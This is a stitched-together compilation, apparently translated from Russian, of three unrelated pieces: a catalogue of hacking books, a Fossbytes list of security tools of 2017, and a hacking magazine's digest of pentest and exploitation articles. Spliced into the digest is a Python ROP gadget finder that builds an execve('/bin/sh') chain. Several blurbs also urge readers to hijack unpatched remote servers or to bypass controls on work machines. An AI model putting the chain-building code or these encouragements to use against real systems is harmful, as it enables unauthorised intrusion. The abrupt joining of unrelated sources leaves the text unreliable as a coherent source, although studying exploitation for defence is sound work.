
    This is, in my opinion, the best handbook-style guide to SQL injection. The volume of material covered in the manual is simply enormous! Nothing superfluous, no filler, everything is clear and well structured.

    -Introduction to Web Application Security
    -Classical vulnerability exploitation technique: injection of SQL statements (SQL Injection)
    -Blind SQL Injection
    -Working with the file system and executing commands on the server when exploiting the SQL Injection vulnerability
    -Methods for bypassing software security filters
    -Methods for bypassing a Web Application Firewall (WAF)


    The art of hacking and protecting systems
    The book covers different types of software: operating systems, databases, Internet servers, etc. Numerous examples show exactly how to find vulnerabilities in software. The topic is especially relevant since software security is currently receiving more and more attention in the computer industry.

    Year of issue: 2006
    Language: Russian

    A guide for beginner hackers and more
    This manual consists of 3 books:
    1. Hacking from the very beginning: methods and secrets
    2. An intelligent guide to hacking and phreaking
    3. A guide for hackers

    Year of issue: 2006
    Language: Russian

    Hacking and customizing Linux. 100 Pro Tips and Tools
    The book is a collection of professional advice for increasing the efficiency of servers running the Linux OS.
    Topics covered: server basics, version control of configuration files and their backup, networking, server monitoring, information security issues, writing scripts in Perl, as well as the three most important programs under Linux: Bind 9, MySQL and Apache.
    The book is intended for network administrators of various levels, as well as Linux users who want to explore the capabilities of this operating system in more depth.
    Year of issue: 2006
    Language: Russian

    Hacking techniques - sockets, exploits, shell code
    In his new book, James Foster, the author of several best-selling books, describes for the first time the methods used by hackers to attack operating systems and application programs. He gives examples of working code in C/C++, Java, Perl and NASL that illustrate methods for detecting and protecting against the most dangerous attacks. The book sets out in detail issues that are essential for any programmer working in the field of information security: socket programming, shellcode, portable applications and the principles of writing exploits.
    After reading this book, you will learn how to:
    Develop shellcode independently;
    Port published exploits to another platform;
    Modify Windows COM objects to suit your needs;
    Improve the Nikto web crawler;
    Understand the "doomsday" exploit;
    Write scripts in NASL;
    Identify and attack vulnerabilities;
    Program at the socket level.
    Year of issue: 2006
    Language: Russian

    Anti-hacker. Computer network protection tools
    Covered: tools for supporting security and analyzing systems; tools for attacking and researching systems on the network; system and network audit tools, as well as tools used in forensic practice and in the investigation of incidents related to the hacking of computer systems. For IT professionals.

    Year of issue: 2003
    Language: Russian

    Hacking Windows XP
    The book is a selection of the best chapters about hacking Windows XP, as well as about securing the system from A to Z. It is simply a huge manual on the hidden settings of Windows XP, its optimization, the command line, the registry and much more, in a form accessible and understandable to young hackers and to those who want to protect themselves from possible threats.
    A high-level book, well executed.
    Year of issue: 2004
    Language: English

    Hacking. The Art of Exploitation
    This is not a catalog of exploits, but a training manual on the basics of hacking, built on examples. It details what every hacker should know and, more importantly, what every security specialist should be aware of in order to take measures that will not allow a hacker to make a successful attack. The reader will need good technical training and full concentration, especially when studying the code examples. But it is very interesting and will allow you to learn a lot: how to create exploits using buffer overflows or format strings, how to write your own polymorphic shellcode in printable characters, how to overcome a non-executable stack by returning to libc, how to redirect network traffic, hide open ports and hijack TCP connections, and how to decrypt 802.11b wireless data using the FMS attack.
    The author looks at hacking as the art of creative problem solving. He refutes the common negative stereotype associated with the word "hacker", and puts the spirit of hacking and serious knowledge first.
    Year of issue: 2005
    Language: Russian

    Collection of books and articles by Chris Kaspersky
    Excerpts: "We live in a harsh world. The software around us contains holes, many of which are the size of elephants. The holes are filled by hackers, viruses and worms, raiding from all corners of the network. The vast majority of remote attacks are carried out through buffer overflows (buffer overfull/overrun/overflow), a special case of which is stack overflow. One who masters buffer overflow technology rules the world! If you want a guide to the land of overflowing buffers, equipped with a comprehensive survival manual, this book is for you! Open the doors to the amazing world behind the facade of high-level programming, where the gears rotate that set everything else in motion.
    Why are overflow errors fundamental? What can you do with them? How do you find a vulnerable buffer? What restrictions does it impose on shellcode? How can these limitations be overcome? How do you compile shellcode? How do you send it to a remote node and remain unnoticed? How do you bypass a firewall? How do you catch and analyze someone else's shellcode? How do you protect your programs from overflow errors?
    It's no secret that the antivirus industry is a closed "club" that holds information intended only for "its own people." This is partly done for security reasons, partly because the pernicious spirit of competition makes itself felt. This book partially lifts the curtain of secrecy..."
    Books:

    Code Optimization Effective Memory Usage
    HACKER DISASSEMBLING UNCOVERED (Draft)
    Portable shell-coding under NT and linux
    Portable shell-coding under NT and linux! (eng)
    Portable shell-coding under NT and linux (rus), 2 chapters
    Notes of a computer virus researcher
    Notes of a computer virus researcher 2, fragment
    Notes from mice
    IDA Mindset
    Debugging without source code
    Amendments
    Mental disassembly technique (excerpt from Techniques and Philosophy of Hacking Attacks)
    CD protection techniques
    Program optimization technique
    Network attack technique
    Shrinking the Internet
    Hacking Fundamentals


    Articles:

    $100,000 per week without expenses or gestures
    blue pill-red pill - the matrix has windows longhorn
    Hidden potential of manual assemblies
    Obj files on the trestle bed or
    On-line patching in secrets and tips
    Rak counterfeit CRC16-32
    SEH at the service of the counter-revolution
    TOP10 software defender errors
    Unformat for NTFS
    Windows on one floppy disk
    Hardware virtualization or emulation without brakes
    Archaeological site of vista-longhorn core
    Archive of old articles
    x86-64 architecture under the assembler's scalpel
    Assembly - extreme optimization
    Assembly language is easy
    Assembly puzzles or whether a machine can understand natural language
    Assembly perversions - stretching the stack
    Assembly without secrets
    Audit and disassembly of exploits
    Database under attack
    Combating resource leaks and overflowing buffers at the linguistic and extra-linguistic level
    All Chris Kaspersky
    Eternal life in DIY games
    Hack patch-guard
    Hacking and protecting WebMoney
    Hacking TVs up close and at a distance
    Burglary through cover
    War of the Worlds - Assembler vs C
    War of the Worlds - assembler vs si
    CD recovery
    NTFS recovery - do-it-yourself undelete
    Data recovery on NTFS partitions
    Recovering deleted files under BSD
    Recovering deleted files under Linux
    Data recovery from laser discs
    The rebirth of lost data - recovery of deleted files under LINUX
    Survival in systems with brutal quotas
    Race to extinction, ninety-five survive
    Extracting information from pdf files or hacking eBooks with your own hands
    Life after BSOD
    Notes on hard drive data recovery
    Capturing and releasing hostages in executable files
    Capturing other people's botnets
    Capturing ring 0 in Linux
    Protecting games from hacking
    Protected axis without antiviruses and brakes
    Star power turns to dust
    Learning English Turbocharged
    Linux kernel research
    How to customize an exploit for yourself
    How CRC16 and 32 are counterfeited
    Counterintelligence with soft-ice in hands
    Borderless copying or advanced CD protection techniques or copy-resistant CDs
    Who's Who of Asians
    Manual therapy of non-traditional self-control
    Metaphysics of wmf files
    Multi-core processors and problems caused by them
    The power and pitfalls of automatic optimization
    Obituary on Web-Money Keeper Classic
    Poor choice of priorities on the PDP-11 and its legacy on C
    Obfuscation and overcoming it
    Fusion Debugging Basics with linice
    Features of disassembly under LINUX using tiny-crackme as an example
    BIOS patch
    Buffer overflow on systems with a non-executable stack
    Overflowing buffers are active defenses
    Intercepting library functions in linux and bsd
    Escape from VMware
    Escape through the firewall
    Diving into gdb: technique and philosophy, or debugging binary files under gdb
    Do-it-yourself polymorphic generator
    Following in the footsteps of MS IE OBJECT tag exploit
    Overcoming firewalls from the outside and inside
    Kernel ghosts or stealth modules
    Programming - with or without a wife
    Programming in machine codes or soft-ice as a logger
    Hide and seek in linux
    Overclocking NTFS
    Overclocking and braking Windows NT
    Overclocking mice or high-speed web surfing for extreme sports enthusiasts
    The real philosophy of a non-existent world
    Repair and restoration of hard disks
    Manual Trojanization of applications under Windows
    Fishing on a local network - sniffering
    Crackme, hiding code on API functions
    Ultra-fast import of API functions
    Secrets of assembling disassembler listings
    Secrets of kernel hacking
    Secrets of conquering the elves
    Cool tricks from the mouse
    Speed ​​scam
    Hidden features of DSL modems
    Comparison of assembly translators
    Old anti-debugging techniques in a new way
    Is it open source?
    Techniques for surviving in troubled waters or how to wear antivirus shoes
    Optimization techniques for Linux, comparison of gcc and Intel C (part 1)
    Optimization techniques for Linux, comparison of gcc and Intel C (part 2)
    Optimization techniques for Linux, comparison of gcc and Intel C (part 3)
    Optimization technique for Linux
    Technique for dumping protected applications
    Turbo driver transfer from Windows to LINUX-BSD
    Universal malware detection method
    Executable file packers for LINUX-BSD
    NTFS file system from outside and inside
    Hacker tricks or how to put a breakpoint on jmp eax
    Hackers love honey
    NT Kernel Hack
    Six sins of malware writers
    Syringe for bsd or functions on the needle
    Expert opinion - email security
    Extreme CPU overclocking
    Electronic money - to trust or not
    Elves big and small

    A selection of 10 great tools for beginners and experienced hackers. Learning these tools will help you improve your hacking knowledge!

    Summary: Fossbytes has compiled a list of useful resources for hacking in 2017. This list is based on reviews by major organizations, your feedback and our own experience. As you explore these resources, you'll learn about the best hacking software, including port scanners, web vulnerability scanners, password crackers, forensic tools, and social engineering tools.

    Disclaimer: The publication of this article on the Fossbytes portal is not an advertisement for malware and is for educational purposes only.

    1. Metasploit

    Metasploit is more than just a collection of tools for creating exploits; I would call Metasploit a framework that you can use to create your own tools. This free tool is one of the most popular information security tools and allows you to find vulnerabilities on various platforms. Metasploit has over 200,000 users and contributors who can help you get the information you need and identify vulnerabilities in your system.

    This 2017 hacking tools package will give you the ability to imitate real hacker attacks in order to identify vulnerabilities. Its penetration testing workflow identifies vulnerabilities and integrates with the Nexpose automated scanner for vulnerability reporting. Using the open Metasploit framework, users will be able to create their own hacking tools.

    Metasploit is supported on all major platforms, including Windows, Linux, and OS X.

    2. Acunetix WVS

    Acunetix is a web vulnerability scanner that scans web pages and identifies flaws that could prove fatal. This multi-threaded application carefully crawls web pages to detect SQL injection, cross-site scripting and other vulnerabilities. Acunetix is a fast and easy-to-use tool that is used to scan websites built with WordPress; more than 1,200 vulnerabilities have been identified on that platform.

    Acunetix includes a Login Sequence Recorder feature that allows you to access password-protected areas of a site. The new AcuSensor technology used in this tool reduces the rate of false positives. All these features make Acunetix WVS an excellent hacking tool in 2017.

    Acunetix is available on Windows XP and later.

    3. Nmap

    Nmap, also known as Network Mapper, belongs to the category of port scanning tools. This free hacking tool is the most popular port scanner, providing effective network discovery and security monitoring. Nmap uses raw IP packets to determine which hosts are available on the network, the services they offer, their operating systems, firewall types and other details.

    Over the past year, Nmap has won several security awards and has been featured in films such as The Matrix Reloaded, Die Hard 4, and others. Nmap has both console support and an application with graphical interface.

    Nmap is supported on all major platforms, including Windows, Linux, and OS X.

    4. Wireshark

    Wireshark is a well-known professional tool that allows you to detect vulnerabilities within a network and across a variety of firewall rules. Wireshark is used by thousands of security professionals to analyze networks, capture sent packets, and thoroughly dissect hundreds of protocols. Wireshark helps you read real-time data from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and other sources.

    The original name of this free tool was Ethereal. Wireshark also has command line support; this version is called TShark.

    Wireshark is supported on all major platforms, including Windows, Linux, and OS X.

    5. oclHashcat

    If cracking passwords is a common task for you, then you must be familiar with the Hashcat password cracking tools. While Hashcat is CPU-based, oclHashcat is an advanced version that uses the GPU to crack passwords.

    oclHashcat bills itself as the world's fastest password cracking tool with the world's only GPGPU-based engine. To use oclHashcat, users with NVIDIA video cards must have ForceWare software version 346.59 or higher, and users with AMD video cards need Catalyst software version 15.7 or later.

    This tool supports the following attack modes:

    • Straight
    • Combined
    • Brute force
    • Hybrid dictionary + mask
    • Hybrid mask + dictionary

    Let's note another important feature: oclHashcat is an open source tool. Its source code is MIT licensed, allowing easy integration or packaging with standard Linux distributions.

    oclHashcat is supported on all major platforms, including Windows, Linux, and OS X.

    6. Nessus Vulnerability Scanner

    This is the best free tool of 2017, running on a client-server architecture. This tool was developed by Tenable Network Security and is one of the most popular vulnerability scanners. Nessus provides solutions for various purposes and different types of users: Nessus Home, Nessus Professional, Nessus Manager and Nessus Cloud.

    Nessus can scan for several types of vulnerabilities, including detection of remote access flaws, misconfiguration alerts, TCP/IP denial of service, PCI DSS audit preparation, malware detection, personal data discovery, etc. To launch a dictionary attack, Nessus can call an external tool called Hydra.

    In addition to the basic functionality mentioned above, Nessus can be used to scan multiple IPv4, IPv6, and hybrid networks. You can conduct a scheduled scan at a time convenient for you, and you can also perform a full rescan or partial scan of previously scanned hosts using the partial scan feature.

    Nessus is supported on a variety of platforms, including Windows 7 and 8, Mac OS X and popular Linux distributions such as Debian, Ubuntu, Kali Linux, etc.

    7. Maltego

    Maltego is an open source forensics platform that offers rigorous data mining and information gathering to build a picture of the cyberattacks around you. Maltego excels at representing the complexity and severity of points of failure in your infrastructure and environment.

    Maltego is a great hacker tool that analyzes the real-world links between people, companies, web pages, domains, DNS servers, IP addresses, documents and anything else you want. This tool is built in Java and has an easy-to-use graphical interface with the ability to reset settings during scanning.

    Maltego is supported on all major platforms, including Windows, Linux, and OS X.

    8. Social-Engineer Toolkit

    Featured in Mr. Robot, TrustedSec's Social-Engineer Toolkit is an advanced framework that simulates several types of social engineering attacks, such as credential harvesting, phishing attacks, etc. In the show, Elliot can be seen using the SMS spoofing feature from the Social-Engineer Toolkit.

    The tool is written in Python and is the standard for social engineering penetration testing, with over two million downloads. It automates attacks and generates disguised emails, malicious web pages, etc.

    To install on Linux, enter the following command:

    git clone https://github.com/trustedsec/social-engineer-toolkit/ set/

    In addition to Linux, Social-Engineer Toolkit has partial support on Mac OS X and Windows.

    9. Netsparker

    Netsparker is a popular web application scanner that finds vulnerabilities such as SQL injection and local file inclusion and suggests corrective actions in a safe, read-only manner. Since this hacking tool produces the results of exploitation, you do not need to verify its findings separately. Where Netsparker cannot verify a vulnerability automatically, it will notify you of this. Getting started with this scanner is very easy: just enter the URL and let Netsparker do the scanning. Netsparker has support for JavaScript and AJAX applications, so you don't have to configure the scanner or rely on complicated scanner settings for different types of web applications.

    If you do not want to pay for the professional version of Netsparker, you can use the demo version of this application.

    Netsparker is only available on Windows.

    10. w3af

    w3af is a free web application security scanner widely used by hackers and security testers. w3af stands for Web Application Attack and Audit Framework. By using this hacking tool, you will be able to obtain information about vulnerabilities and later use it when conducting penetration tests. The creators of w3af claim that their tool is able to identify more than 200 vulnerabilities (including cross-site scripting, SQL injection, incorrect PHP configuration, poorly protected credentials and unhandled application errors) and make web applications (web pages) more secure.

    w3af has both command line support and a GUI application. In fewer than 5 clicks, using a pre-installed profile for beginners, you can conduct a security check of a web application. This tool has good documentation, so new users can easily understand w3af. Since it is an open source tool, experienced developers will be able to add new features and build something new on top of w3af.

    w3af is available on Linux, BSD, and OS X. Windows is also supported, but only by earlier versions.

    Other top security and hacking tools of 2017, broken down by category:

    Web vulnerability scanners: Burp Suite, Firebug, AppScan, OWASP Zed, Paros Proxy, Nikto, Grendel-Scan

    Vulnerability exploitation tools: Netsparker, sqlmap, Core Impact, WebGoat, BeEF

    Forensic tools: Helix3 Pro, EnCase, Autopsy

    Port scanners: Unicornscan, NetScanTools, Angry IP Scanner

    Traffic monitoring tools: Nagios, Ntop, Splunk, Ngrep, Argus

    Debuggers: IDA Pro, WinDbg, Immunity Debugger, GDB

    Rootkit detectors: DumpSec, Tripwire, HijackThis

    Encryption tools: KeePass, OpenSSL, OpenSSH/PuTTY/SSH, Tor

    Password cracking tools: John the Ripper, Aircrack, Hydra, ophcrack

    We hope this list of the best hacking and security tools of 2017 was useful to you.

    If we wanted to make a book from the coolest hacking articles published in our magazine, it would be so thick that if we stacked all the published volumes on top of each other, the resulting tower would be as tall as the Burj Khalifa. Okay, okay, "that's not accurate" :). After all, why republish historical articles that have lost their relevance? Instead, we will collect in one piece the coolest texts on information security that have been published over the past few years and that you might have missed.

    In the last issue, we made a selection on , which was primarily of interest to programmers, reversers and software engineers. Today we present to your attention articles devoted primarily to the hacker craft: everything related to hacking operating systems and DBMSs, penetration testing of IT infrastructure, and OS and application software vulnerabilities. You will also find half-forgotten or little-known features and tricks that will be useful in practice if you are truly devoted to our cause! Please note: just listing these articles would take up six full pages of the old paper "Hacker". 🙂

    Forensic memory analysis. Examining processes in Windows 7

    After a hack or data leak, when the incident has already happened and it cannot be hushed up :), computer security forensic specialists, or forensic experts as they are often called, get involved in the case. In search of the "patient zero" through whom the hack occurred, they have to collect and analyze evidence. In this article you will get to know some RAM analysis techniques, how to examine Windows processes, ways to identify rootkits that use undocumented features of the NT kernel, and some little-known coding tricks.

    The material will be useful to anyone involved in or simply interested in forensics.

    Manual resuscitation of a memory dump. Manual Memory Recovery Guide


    A common situation: the code is securely packed, and in order to analyze the program or malware you have to take a memory dump and then pick it apart by hand with other tools. But there is a problem: the dump you take may turn out to be broken, that is, unsuitable for analysis. What do you do in this case? This article, my friend, will tell you how to competently dump an image from memory and how to restore it if it is damaged. If you are a reverse engineer or a forensics expert, believe me, this will definitely come in handy someday!

    Laboratory workshop on Metasploit Framework. Hidden tricks of MSF



    Who doesn't know MSF? This "Swiss army knife" is one of the five most used tools of pentesters and of just about any more or less advanced security specialist. The tool is constantly being developed and updated; many new features and little-known options appear that are easy to miss, but they really expand its capabilities or make the work much more convenient and comfortable. Automation of frequently repeated operations also plays an important role. This material will cover some of the features of MSF, more or less advanced built-in capabilities of the tool, as well as ways of automating routine operations, which will save you a lot of time. You simply must know this!

    Meterpreter in action. Tricky Tricks via MSF



    Those who have immersed themselves at all in the topic of working with the Metasploit Framework know how many opportunities a correctly delivered "payload" provides on a vulnerable machine. We are talking about Meterpreter, a universal advanced payload, both what is included in it and what we can add manually. You will learn how to use the payload correctly and effectively to your benefit, what features Meterpreter has, and, of course, you will be able to test all this in practice. Together with the previous article about the Metasploit Framework, this turns out to be a real must-read for a beginner or a slightly more advanced pentester.

    DNS Feedback. We bypass barriers and organize access to the Network


    So, you got to a vulnerable machine in the corporate network of a large company. However, the firewall cuts off all unknown connections, and the list of ports to which you can connect is fixed. Accordingly, a reverse TCP shell, and especially a bind TCP shell, will no longer work. Will our machine really remain out of reach? This is where the trick of encapsulating the connection into the legitimate DNS traffic of the vulnerable machine comes to your aid. Do you think it's difficult? The material will tell you about DNS and how you can play with GET/POST requests in order to quietly penetrate the corporate perimeter.

    DNS: feedback. Advanced payload for tunneling



    What if the vulnerable machine does not have access to the Internet at all, or the traffic filtering rules are so strict that it is impossible to create a tunnel as described in the previous material? The second part of the article on DNS tunneling explains how to solve this problem using more clever and sophisticated techniques. You will learn how to modify the shell in such a way that it receives control commands wrapped inside service traffic, how to set up a bot that performs all this routine work, and, finally, how to use all this to gain access to the machine we need.

    DNS attacks: yesterday, today, tomorrow. Ghost Domain Names and other 0day methods to hack the domain name system



    Have you heard about DNS attacks? The once sensational Ghost Domain Names attack still has a chance of being carried out today. This article discusses it and other methods of attacking the domain name system.

    Don't believe your eyes. Current spoofing methods today



    The heyday of spoofing attacks was in what are, by today's standards, historical times. However, to this day there are still methods and tools that allow you to successfully impersonate objects in a network segment. This is a rather risky part of attacks, for example on remote banking systems, and it is also often used in routine pentests. From this article you will understand how easy it is to carry out a spoofing attack and what it can lead to.

    Not enough rights? Enough: 8 tricks to bypass group policies in a domain



    Do you feel like a guest on your own work laptop? Do you dream of customizing your desktop, browser, network and update system for yourself? We present to your attention a set of eight tricks that allow you, one way or another, to bypass the application of domain group policies. Of course, some of the techniques may no longer work on Windows 10, but old versions of Windows (XP to 7) are still alive on corporate machines, and many old bugs still work. The article provides a set of ready-to-use recipes; you can try them on your computer and prove to the admins that GPO is not as good as its reputation.

    We're going for a promotion. Recipes for raising privileges under Windows



    We continue the topic of digging into Windows. When you perform a pentest or penetrate for other purposes, for example, an Active Directory domain, a machine on which a website is hosted, or an accountant's workstation with 1C, you will almost certainly be faced with the task of raising your privileges. Solving it will determine whether you can move forward or not. This article describes everything (or almost everything) related to moving up in Windows systems: eleven techniques that will help you go from guest to local or domain administrator.

    Domain attacks. Taking over the corporate network



    The vast majority of companies in the corporate sector use Windows Server and the Active Directory directory service as their base, even if the rest of their racks are filled to capacity with machines running *NIX. Therefore, control over a domain is a tasty morsel for any hacker or pentester. Accordingly, you cannot do without administrator privileges. How to get them is what we will talk about in this article. Vulnerabilities in network services and the OS, holes in the network architecture and authentication problems, SMB Relay and timeless ARP spoofing... A must-read for everyone interested in pentests.

    Give back the rights! How to bypass restrictions on a work computer



    Another material on the topic of obtaining administrator rights on a local or network machine. A lot of recipes and techniques are given, so even if some don't work, there is still a chance of success. There are "insider" flash drives and booting from a hidden partition, and using alternate NTFS streams to bypass file permissions. Quite a lot of attention is paid to re-enabling locked-down USB ports. In addition, you will learn about tricks with shortcuts, defeating group policies, and bypassing bans on running software that is not on the white lists. How do you like this set? You will definitely find something for yourself, and a pentester should definitely study it.

    We study and open BitLocker. How does Windows disk protection work and what is needed to hack it?



    Encryption of local drives and removable media is one of the fundamentals of Windows security, as declared by its developers. Leaving aside marketing promises and PR, how reliable is the technology? After all, it is very often used in the corporate sector by default.
    In this article we will take a detailed look at the internals of different versions of BitLocker (including those shipped in the latest Windows 10 builds) and, of course, we will show how to bypass this built-in protection mechanism. Whether to use BitLocker after this or not is up to you to decide.

    7 recipes for preparing Windows passwords. How to dump and use password hashes from Windows accounts



    Once upon a time, in the old days, dumping and then brute-forcing the passwords of admin accounts was a surefire and very popular way to gain administrative privileges. Now, with the development of other protection mechanisms, the topic has become somewhat outdated, but it is still alive!

    The article is a complete collection of recipes describing how to dump user password hashes, recover the original password by brute force, and use the extracted hash itself to gain access to protected resources through flaws in the NTLM authentication protocol (the so-called pass-the-hash attack). The value of the material is that it contains a minimum of theory and only practice. A real case study for a pentester!

    Don't rub salt in my password. Reanimating a dead MD5



    The previous article already covered cracking the passwords of Windows accounts in detail. Continuing the topic, let's talk about so-called salted hashes, which require a slightly different approach to crack. The focus is mainly on the MD5 algorithm, its weaknesses (the appearance of collisions, i.e. repeated hashes) and how they can be used for successful brute force. If you are a coder and are ready to write scripts to exploit flaws in MD5, this material is definitely for you!

    Anonymous attack on Windows. Tricky tricks of a seasoned hacker



    The article takes us back to the era of Windows XP through Vista, showing how long-known but still working features let you get a list of users through a null session and hijack an RDP terminal connection, and what can be configured in the system registry to protect yourself from prying eyes and playful hands.

    Steal in 60 seconds. A method of remotely taking over a dedicated server ("dedik") running Windows



    Have you ever dreamed of taking over someone else's server and feeling like a god? 🙂 The material contains real advice on how to hijack a remote server using the familiar Metasploit Framework (MSF) and several kinds of Meterpreter shells. Of course, a patch for this vulnerability was released long ago, but, as you know, you can still find machines on the Internet running an outdated or unpatched OS. Armed with the information from this article, you can try your strength and luck. What if?

    Hacking scenario. Analyzing typical attack scenarios on corporate networks



    This article is based on the many years of experience of pentesters from Positive Technologies, who perform hundreds of penetration tests every year for major companies in Russia and abroad. Over this time the experts have accumulated a large number of typical situations and general cases describing the most common scenarios of successful attacks, which allowed them to gain control over the customer's network in 80% of cases. The material discusses common mistakes and the typical ways companies get hacked. After reading the article you will be able to assess how secure your own network is, and if you are a pentester yourself, you will get a set of ready-to-use scenarios.

    We measure vulnerabilities. Classifiers and metrics of computer flaws



    Lately you hear more and more often: "there is a vulnerability here, a gap was found in this software, a hole in that service." For each such vulnerability a bulletin is issued describing the problem itself, the vendor's recommendations and other measures you can take to protect yourself. All this information is published on bug trackers, special sites that collect information about vulnerabilities. Anyone can read it, and the more enterprising can always buy an exploit for the vulnerability or a ready-made attack tool on the black market. When you read such bulletins, you have probably noticed that each bug is classified in a certain way. What is "vulnerability measurement", what criteria are used to measure it, and why do you need to know about it at all? You will find the answers in this article.

    Depraved programming. ROP tricks that lead to victory



    When you dig into the topic of vulnerabilities and exploits, you often hear about a "buffer overflow" that eventually lets an attacker execute arbitrary code on the victim's system. Such a bug can be exploited deliberately, for example by return-oriented programming, or ROP. This technique, which also applies to use-after-free bugs, format string errors and the like, helps to defeat DEP and even ASLR. A malware-spreading exploit for a vulnerability in Acrobat Reader (CVE-2010-0188) is a prime example. The same method was once used at Pwn2Own to hack an iPhone and in an exploit against PHP 6.0 DEV. How to do this is what the article is about.
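    The two mechanical steps behind every ROP exploit are finding gadgets (short instruction sequences ending in `ret`) in code that is already mapped executable, and laying their addresses out on the stack so that each `ret` transfers control to the next one. The following is an added example, not code from the article or from any of the exploits it mentions: it decodes only a handful of x86-64 opcodes, scans a constructed byte blob assumed to be mapped at 0x401000 (as in a non-PIE binary), and builds an execve chain under the assumption that a "/bin/sh" string already sits at 0x404000. Real tools such as ROPgadget or ropper use a full disassembler, but the search strategy is the same.

```python
"""Minimal x86-64 ROP gadget finder and chain builder.

Added example, not code from the article: it decodes only a handful of
opcodes (pop reg, ret, nop, syscall, one mov) so that it runs stand-alone
on a constructed byte blob.
"""
import struct
from typing import Dict, List, Optional, Sequence, Tuple

# Constructed sample "code section" (assumed to be mapped at SAMPLE_BASE):
#   48 89 c7 c3   mov rdi, rax ; ret
#   5f c3         pop rdi ; ret
#   5e 5a c3      pop rsi ; pop rdx ; ret
#   58 c3         pop rax ; ret
#   0f 05 c3      syscall ; ret
#   90 90         nop ; nop (no ret, never part of a gadget)
SAMPLE_TEXT = bytes.fromhex("4889c7c3" "5fc3" "5e5ac3" "58c3" "0f05c3" "9090")
SAMPLE_BASE = 0x401000  # assumed load address, as in a non-PIE binary

REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]


def decode_one(code: bytes, i: int) -> Optional[Tuple[str, int]]:
    """Decode one instruction from the tiny subset we know; (text, length) or None."""
    b = code[i]
    if b == 0xC3:
        return ("ret", 1)
    if 0x58 <= b <= 0x5F:                       # pop r64, one-byte encoding
        return (f"pop {REG64[b - 0x58]}", 1)
    if b == 0x90:
        return ("nop", 1)
    if code[i:i + 2] == b"\x0f\x05":
        return ("syscall", 2)
    if code[i:i + 3] == b"\x48\x89\xc7":
        return ("mov rdi, rax", 3)
    return None


def find_gadgets(code: bytes, base: int, lookback: int = 12) -> Dict[int, str]:
    """Map address -> 'insn ; insn ; ret' for every gadget ending in a ret.

    For each 0xC3 we try every start offset up to `lookback` bytes before it;
    x86 is not self-synchronising, so an offset that was not an instruction
    boundary for the compiler can still decode to a usable gadget.
    """
    gadgets: Dict[int, str] = {}
    for ret_off in (i for i, b in enumerate(code) if b == 0xC3):
        for start in range(ret_off, max(-1, ret_off - lookback - 1), -1):
            insns: List[str] = []
            pos = start
            while pos < ret_off:
                decoded = decode_one(code, pos)
                if decoded is None:
                    break
                insns.append(decoded[0])
                pos += decoded[1]
            # keep it only if decoding landed exactly on our ret and did not
            # pass through an earlier ret (that would end the gadget early)
            if pos == ret_off and "ret" not in insns:
                gadgets[base + start] = " ; ".join(insns + ["ret"])
    return gadgets


def build_chain(gadgets: Dict[int, str], steps: Sequence[Sequence]) -> bytes:
    """Lay out the fake stack: each step is (gadget text, *values it pops).

    The chain overwrites the saved return address; every `ret` pops the next
    gadget address, so the CPU walks our list without any injected code,
    which is why ROP works with DEP/NX enabled.
    """
    by_text: Dict[str, int] = {}
    for addr, text in sorted(gadgets.items()):
        by_text.setdefault(text, addr)          # prefer the lowest address
    chain = b""
    for text, *values in steps:
        if text not in by_text:
            raise LookupError(f"no gadget for {text!r}")
        chain += struct.pack("<Q", by_text[text])
        for v in values:
            chain += struct.pack("<Q", v)
    return chain


# Assumed: "/bin/sh\0" already sits at 0x404000 (e.g. in .data). execve is
# syscall 59 on x86-64, so we need rax=59, rdi=path, rsi=0, rdx=0, syscall.
EXAMPLE_STEPS = [
    ("pop rax ; ret", 59),
    ("pop rdi ; ret", 0x404000),
    ("pop rsi ; pop rdx ; ret", 0, 0),
    ("syscall ; ret",),
]


def demo() -> Tuple[Dict[int, str], bytes]:
    gadgets = find_gadgets(SAMPLE_TEXT, SAMPLE_BASE)
    return gadgets, build_chain(gadgets, EXAMPLE_STEPS)


if __name__ == "__main__":
    g, chain = demo()
    for addr in sorted(g):
        print(f"{addr:#x}: {g[addr]}")
    print("chain:", chain.hex())
```

    Note how `find_gadgets` also reports gadgets that start inside another instruction (the bare `ret` at every 0xC3 and `pop rdx ; ret` in the middle of `pop rsi ; pop rdx ; ret`); that is exactly what makes gadget supply in real binaries so rich. With ASLR the chain above would additionally need a leaked address to rebase `SAMPLE_BASE`, which is the part of the technique the article's examples are about.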

    Exploit "on the knee". We write an exploit using improvised means



    Any advanced pentester sooner or later faces the task of writing an exploit for a specific service or system. Although there is plenty of theoretical material, practical and understandable examples are still lacking. In this article the task was to write a working exploit for a specific program. We look at all the subtleties and try to understand exactly how vulnerabilities are found and successfully exploited. If you are a reverse engineer or a pentester, this is a must-read!

    We pick at the armor of Windows. Let's find out what ACL/DACL is and how it can be exploited



    The security of the NTFS file system is based on access control lists (ACLs) and the file permission system built on top of them. Although NTFS has shown itself to be a very resilient FS, as Malchish-Kibalchish said, "the Russians have secret passages, and you can't fill them up." After all, if a hacker bypasses the ACL restrictions, he can gain privileged access to absolutely any files, including system files, which already poses serious risks. The material covers the theory of ACL/DACL, tells what can be tinkered with here, and, of course, looks at examples of how the flaws found can be exploited to your advantage.

    Taming the wild "kitty", or leaking passwords by the suitcase. Hacking routers through SNMP flaws



    It's no secret that Cisco is the most popular vendor of network equipment, so it needs no proof that the vast majority of companies use this manufacturer's switches and routers as the basis of their network, or at least its core. It follows that any critical bug in their firmware can jeopardize the operation and connectivity not only of a corporate network but also of particularly important segments of the Internet. The article covers several Cisco vulnerabilities that you simply must know about, from hacking a router via SNMP to leaking passwords through a GRE tunnel.

    Bluetooth tricks. Little tricks for using the “blue tooth”



    Back in the days when not everyone had practically unlimited Internet on their phone, people actively exchanged files via Bluetooth. The "blue tooth" is still around, but it now serves a somewhat different purpose: communication between various wearable devices and in the world of the Internet of Things.

    What does all this mean for a hacker? With the right tool on a smartphone or tablet you can work real miracles: intercept remote communication and control someone else's device, sniff traffic, find "invisible" devices and even DoS devices detected nearby.

    Master class on resuscitation of nixes. Methods for dealing with Linux and FreeBSD failures



    UNIX has long proven itself a reliable and predictable system. But it happens that after a system error or other failure, the fate of the operating system depends entirely on the qualifications of its owner. UNIX's design is so simple and straightforward that the OS can be brought back to its feet no matter what state it is in. The material covers the most typical crash situations of *NIX systems: a damaged MBR and a forgotten root password, freezes and spontaneous reboots, kernel panic, hard drive failure, a broken xorg.conf, a missing video driver, misconfigured network interfaces, broken DNS resolution; and it gives recipes for fixing them and restoring operation.

    How to become ssh-friendly. Full-guide on using Secure Shell



